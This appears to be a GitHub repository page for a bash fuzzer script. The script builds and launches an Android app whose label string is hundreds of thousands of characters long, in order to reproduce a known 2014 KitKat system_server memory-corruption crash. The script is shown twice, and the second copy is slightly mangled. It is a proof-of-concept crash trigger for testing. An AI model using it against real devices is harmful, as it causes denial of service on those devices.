dweinstein/AndroidManifestFuzzer

## AndroidManifestFuzzer
#!/bin/bash
#Basic set up for an Application AndroidManifest Fuzzer
#this requires a preexisting ant buildable application project to be set up! so get the SDK and ant1.8
#this file reproduces the bug mentioned here http://ibrahimbalic.com/2014/android-os-memory-corruption-bug/
#NOTE: values from 260000 and up cause SIGSEGvs to be sent to the system_server (test on KitKat 4.4.2)
#NOTE: you should probably monitor $(adb logcat)||(/system/bin/gdbserver) for responsiveness to the issue

APP_PROJ_DIR="..." #<-- PATH TO PROJ DIR
APP_PACKAGE_NAME="..." #<-- PACKAGE NAME
APP_LAUNCH_COMP="..." # <--- MAIN ACTIVITY NAME
ITER=0
for ((sample_len=251000;sample_len<252000;sample_len+=1000)) #{1000..3000}
do
	FUZZ_DATA=`python -c "print 'A'*$sample_len"` #*$sample_len"`
	echo '<?xml version="1.0" encoding="utf-8"?>
	 <manifest xmlns:android="http://schemas.android.com/apk/res/android"
		 package="com.vuln.manifest"
		 android:versionCode="1"
		 android:versionName="1.0">
		 <application android:label="'$APP_LAUNCH_COMP'" android:icon="@drawable/ic_launcher">
			 <activity android:name="'$APP_LAUNCH_COMP'"
				 android:label="@string/app_name">
					 <intent-filter>
						 <action android:name="android.intent.action.MAIN" />
						 <category android:name="android.intent.category.LAUNCHER" />
					 </intent-filter>
			 </activity>
		 </application>
	 </manifest>'  > $APP_PROJ_DIR"/AndroidManifest.xml"
	echo '<?xml version="1.0" encoding="utf-8"?>
				<resources>
	    			<string name="app_name">'$FUZZ_DATA'</string>
				</resources>' > $APP_PROJ_DIR"/res/values/strings.xml"
	#cat $APP_PROJ_DIR"/AndroidManifest.xml"
	echo "[*] {$ITER} (activity->android:label):$sample_len ~ "`cat $APP_PROJ_DIR"/res/values/strings.xml" | wc -c`
	cd $APP_PROJ_DIR
	#ant debug install 2>&1 >> /dev/null
	ant debug install
	adb shell am start -n $APP_PACKAGE_NAME/$APP_PACKAGE_NAME"."$APP_LAUNCH_COMP
	cd -
	ITER=`expr $ITER + 1`
	echo "[*] Launch app and check adblog!"
	sleep 60
done
	#!/bin/bash
	#Basic set up for an Application AndroidManifest Fuzzer
	#this requires a preexisting ant buildable application project to be set up! so get the SDK and ant1.8
	#this file reproduces the bug mentioned here http://ibrahimbalic.com/2014/android-os-memory-corruption-bug/
	#NOTE: values from 260000 and up cause SIGSEGvs to be sent to the system_server (test on KitKat 4.4.2)
	#NOTE: you should probably monitor $(adb logcat)\|\|(/system/bin/gdbserver) for responsiveness to the issue

	APP_PROJ_DIR="..." #<-- PATH TO PROJ DIR
	APP_PACKAGE_NAME="..." #<-- PACKAGE NAME
	APP_LAUNCH_COMP="..." # <--- MAIN ACTIVITY NAME
	ITER=0
	for ((sample_len=251000;sample_len<252000;sample_len+=1000)) #{1000..3000}
	do
	FUZZ_DATA=`python -c "print 'A'$sample_len"` #$sample_len"`
	echo '<?xml version="1.0" encoding="utf-8"?>
	<manifest xmlns:android="http://schemas.android.com/apk/res/android"
	package="com.vuln.manifest"
	android:versionCode="1"
	android:versionName="1.0">
	<application android:label="'$APP_LAUNCH_COMP'" android:icon="@drawable/ic_launcher">
	<activity android:name="'$APP_LAUNCH_COMP'"
	android:label="@string/app_name">
	<intent-filter>
	<action android:name="android.intent.action.MAIN" />
	<category android:name="android.intent.category.LAUNCHER" />
	</intent-filter>
	</activity>
	</application>
	</manifest>' > $APP_PROJ_DIR"/AndroidManifest.xml"
	echo '<?xml version="1.0" encoding="utf-8"?>
	<resources>
	<string name="app_name">'$FUZZ_DATA'</string>
	</resources>' > $APP_PROJ_DIR"/res/values/strings.xml"
	#cat $APP_PROJ_DIR"/AndroidManifest.xml"
	echo "[*] {$ITER} (activity->android:label):$sample_len ~ "`cat $APP_PROJ_DIR"/res/values/strings.xml" \| wc -c`
	cd $APP_PROJ_DIR
	#ant debug install 2>&1 >> /dev/null
	ant debug install
	adb shell am start -n $APP_PACKAGE_NAME/$APP_PACKAGE_NAME"."$APP_LAUNCH_COMP
	cd -
	ITER=`expr $ITER + 1`
	echo "[*] Launch app and check adblog!"
	sleep 60
	done